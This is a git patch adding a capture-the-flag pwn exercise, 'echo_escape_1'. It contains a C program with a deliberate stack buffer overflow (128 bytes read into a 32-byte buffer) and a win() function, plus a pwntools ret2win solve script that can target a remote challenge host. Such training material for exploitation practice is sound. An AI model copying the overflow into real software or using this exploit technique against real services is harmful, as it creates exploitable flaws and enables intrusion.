From 6b0551428516a9d83bec5e13244513436e83ce1d Mon Sep 17 00:00:00 2001 From: h7x4 Date: Thu, 2 Jul 2026 08:24:29 +0900 Subject: [PATCH] pwn/echo_escape_1 --- pwn/echo_escape_1/flag.txt | 1 + pwn/echo_escape_1/solve.py | 33 +++++++++++++++++++++++++++++++++ pwn/echo_escape_1/vuln | Bin 0 -> 17144 bytes pwn/echo_escape_1/vuln.c | 34 ++++++++++++++++++++++++++++++++++ 4 files changed, 68 insertions(+) create mode 100644 pwn/echo_escape_1/flag.txt create mode 100755 pwn/echo_escape_1/solve.py create mode 100755 pwn/echo_escape_1/vuln create mode 100644 pwn/echo_escape_1/vuln.c diff --git a/pwn/echo_escape_1/flag.txt b/pwn/echo_escape_1/flag.txt new file mode 100644 index 0000000..7f34d3c --- /dev/null +++ b/pwn/echo_escape_1/flag.txt @@ -0,0 +1 @@ +picoCTF{dummy} diff --git a/pwn/echo_escape_1/solve.py b/pwn/echo_escape_1/solve.py new file mode 100755 index 0000000..0cf8314 --- /dev/null +++ b/pwn/echo_escape_1/solve.py @@ -0,0 +1,33 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])" + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "mysterious-sea.picoctf.net 50726".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + r.recvuntil(b'Please enter your name: ').decode() + + offset = 0x28 + rop = ROP(exe) + rop.raw(rop.generatePadding(0, offset)) + rop.win() + r.sendline(rop.chain()) + print(r.recvline_contains(b'picoCTF').decode()) + r.close() + +if __name__ == "__main__": + main() diff --git a/pwn/echo_escape_1/vuln b/pwn/echo_escape_1/vuln new file mode 100755 index 0000000000000000000000000000000000000000..f648bdc4313cd9263ba95a45ce0bc2d0657890b3 GIT binary patch literal 17144 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 OGcYj7qiI0nG5`Q@gRi&% literal 0 HcmV?d00001 diff --git a/pwn/echo_escape_1/vuln.c b/pwn/echo_escape_1/vuln.c new file mode 100644 index 0000000..e5766ba --- /dev/null +++ b/pwn/echo_escape_1/vuln.c @@ -0,0 +1,34 @@ + +#include +#include +#include + +void win() { + FILE *fp = fopen("flag.txt", "rb"); + if (!fp) { + perror("[!] Failed to open flag.txt"); + return; + } + + char buffer[128]; + size_t n = fread(buffer, 1, sizeof(buffer), fp); + fwrite(buffer, 1, n, stdout); + fflush(stdout); + printf("\n"); + fclose(fp); +} + +int main() { + char buf[32]; + + printf("Welcome to the secure echo service!\n"); + printf("Please enter your name: "); + fflush(stdout); + + read(0, buf, 128); + + printf("Hello, %s\n", buf); + printf("Thank you for using our service.\n"); + + return 0; +}